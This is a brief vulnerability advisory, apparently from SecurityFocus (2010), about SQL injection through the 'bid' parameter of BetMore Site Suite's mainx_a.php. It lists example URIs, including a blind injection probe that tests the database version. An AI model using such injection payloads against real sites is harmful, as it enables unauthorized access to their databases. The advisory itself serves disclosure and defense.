BetMore Site Suite 'bid' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/mainx_a.php?lngx=[true-value]&x=[true-value]&xid=[true-value]&bid=[SQL]
http://www.example.com/mainx_a.php?lngx=12&x=367&xid=2&bid=78222 and substring(version(),1,1)=4
http://www.example.com/mainx_a.php?lngx=12&x=367&xid=2&bid=78222 and substring(version(),1,1)=4


 

Privacy Statement
Copyright 2010, SecurityFocus